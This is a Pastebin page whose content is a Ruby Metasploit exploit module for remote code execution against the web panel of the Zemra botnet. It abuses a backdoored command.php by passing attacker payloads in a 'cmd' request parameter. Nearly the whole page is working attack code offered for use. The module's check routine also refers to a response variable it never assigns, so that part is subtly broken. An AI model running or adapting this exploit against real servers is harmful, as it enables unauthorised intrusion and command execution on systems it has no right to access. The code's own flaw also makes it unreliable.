API tools faq
paste
Advertisement
1337ings

[Ruby] Zemra-Botnet_RCE

1337ings
Feb 1st, 2017
864
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 2.40 KB | None | 0 0
raw download clone embed print report
  1. # Zemra Botnet CnC Web Panel Remote Code Execution
  2.  
  3. require 'msf/core'
  4.  
  5. class Metasploit3 < Msf::Exploit::Remote
  6.   Rank = ExcellentRanking
  7.  
  8.   include Msf::Exploit::Remote::HttpClient
  9.  
  10.   def initialize(info={})
  11.     super(update_info(info,
  12.       'Name'           => 'Zemra Botnet CnC Web Panel Remote Code Execution',
  13.       'Description'    => %q{
  14.         This module exploits the CnC web panel of Zemra Botnet which contains a backdoor
  15.         inside its leaked source code. Zemra is a crimeware bot that can be used to
  16.         conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
  17.       },
  18.       'License'        => MSF_LICENSE,
  19.       'Author'         =>
  20.         [
  21.           'Chris Poole <@codingplanets>'
  22.         ],
  23.       'References'     =>
  24.         [
  25.           ['URL', 'http://twitter.com/codingplanets'],
  26.           ['URL', 'http://github.com/codingplanets'], #leaked source code and backdoor intro
  27.           ['URL', 'http://pastebin.com/u/1337ings']
  28.         ],
  29.       'Privileged'     => false,
  30.       'Payload'        =>
  31.         {
  32.           'Space'    => 10000,
  33.           'DisableNops' => true,
  34.           'Compat'      =>
  35.             {
  36.               'PayloadType' => 'cmd'
  37.             }
  38.         },
  39.       'Platform'       => %w{ unix win },
  40.       'Arch'           => ARCH_CMD,
  41.       'Targets'        =>
  42.         [
  43.           ['zemra panel / Unix', { 'Platform' => 'unix' } ],
  44.           ['zemra panel / Windows', { 'Platform' => 'win' } ]
  45.         ],
  46.       'DisclosureDate' => '2/2/17',
  47.       'DefaultTarget'  => 0))
  48.  
  49.     register_options(
  50.       [
  51.         OptString.new('TARGETURI',[true, "The path of the backdoor inside Zemra Botnet CnC Web Panel", "/Zemra/Panel/Zemra/system/command.php"]),
  52.       ],self.class)
  53.   end
  54.  
  55.   def check
  56.     txt = Rex::Text.rand_text_alpha(8)
  57.     http_send_command(txt)
  58.     if res && res.body =~ /cmd/
  59.       return Exploit::CheckCode::Vulnerable
  60.     end
  61.     return Exploit::CheckCode::Safe
  62.   end
  63.  
  64.   def http_send_command(cmd)
  65.     uri = normalize_uri(target_uri.path.to_s)
  66.     res = send_request_cgi({
  67.       'method'  => 'GET',
  68.       'uri'             => uri,
  69.       'vars_get'        =>
  70.         {
  71.           'cmd' => cmd
  72.         }
  73.     })
  74.     unless res && res.code == 200
  75.       fail_with(Failure::Unknown, 'Failed to execute the command.')
  76.     end
  77.     res
  78.   end
  79.  
  80.   def exploit
  81.     http_send_command(payload.encoded)
  82.   end
  83. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!